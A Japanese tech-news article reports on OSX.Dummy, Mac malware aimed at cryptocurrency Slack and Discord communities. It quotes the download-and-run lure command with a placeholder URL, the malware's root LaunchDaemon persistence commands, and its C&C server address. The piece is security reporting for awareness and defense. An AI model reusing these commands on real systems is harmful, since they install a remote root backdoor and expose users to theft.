Macをターゲットとした新種のマルウェア「OSX.Dummy」が仮想通貨コミュニティ内で流行中。

セキュリティ

2018.07.03

記事内に広告が含まれています。

　Macをターゲットとした新しいマルウェア「OSX.Dummy」が仮想通貨コミュニティ内で流行しているそうです。詳細は以下から。

　米SANSのRemco VerhoefさんやObjective-SeeのPatrick Wardleさんらによると、現在SlackやDiscordの仮想通貨コミュニティチャット内で、ユーザーのMacに侵入し任意のコマンドを実行したり、個人情報を盗み出すマルウェア「OSX.Dummy」をダウンロードするスニペットが共有＆流行しているそうです。

Happy Friday!
Wrote a new blog post for ya'll 🙂

🍎 New mac malware
🔒 Targeting the crypto community
😞 0% VT detections

….why is it named OSX.Dummy? 👾☠️
📝 Read to find out: https://t.co/CEV9i8LkmT

🙏 Credit to @remco_verhoef for the original discovery/analysis! pic.twitter.com/YXCv0cwWAM

— patrick wardle (@patrickwardle) 2018年6月29日

Previous days we’ve seen multiple MacOS malware attacks, originating within crypto related Slack or Discord chats groups by impersonating admins or key people. Small snippets are being shared, resulting in downloading and executing a malicious binary.

InfoSec Handlers Diary Blog – Crypto community target of MacOS malware

　Patrickさんによると、このOSX.Dummyマルウェアは以下のように署名されておらず、通常署名がない実行ファイルはmacOSのセキュリティ機能「Gatekeeper」によってブロックされますが、このマルウェアはユーザーがターミナルコマンドを通してダウンロード＆実行するためGatekeeperに捕まらず実行され、

cd /tmp && curl -s curl $MALICIOUS_URL > script && chmod +x script && ./script

ユーザーはSlacksなどのコミュニティ内で実行するように求められるそうです。

ユーザーが管理者パスワードを要求後、パスワードが入力されるとダウンロードしたスクリプトを”/var/root”へ移動し、LaunchDaemonsやplistを作成、デーモンを起動、攻撃者のC&Cサーバーと接続を開始し接続が成功すれば、悪意のある攻撃者がRoot権限で任意のスクリプトを実行できるようになるそうです。

moving the script into /var/root

mv "/tmp/script.sh" "/var/root/"

dumping a plist file to /tmp/com.startup.plist and then moving into the LaunchDaemons directory

mv "/tmp/com.startup.plist" "/Library/LaunchDaemons/

setting the owner of the com.startup.plist plist to root

chown root "/Library/LaunchDaemons/com.startup.plist"

launching the com.startup.plist launch daemon

launchctl load "-w" "/Library/LaunchDaemons/com.startup.plist"

If the connection to the attacker’s C&C server (185.243.115.230:1337) succeeds, the attacker will be able to arbitrarily execute commands (as root!) on the infected system.

OSX.Dummy – Objective-See

OSX.Dummyの検出

　OSX.Dummyは2018年06月29日時点で検出できるウィルス対策エンジンは0だったそうですが、現在ではESETやSymantec, Kaspersky, Sophos, Trend Microなど9つのセキュリティアプリが検出に対応しており、実行ファイルやC&Cサーバーも明らかになってきたので、気になる方は以下の情報をチェックしてみてください。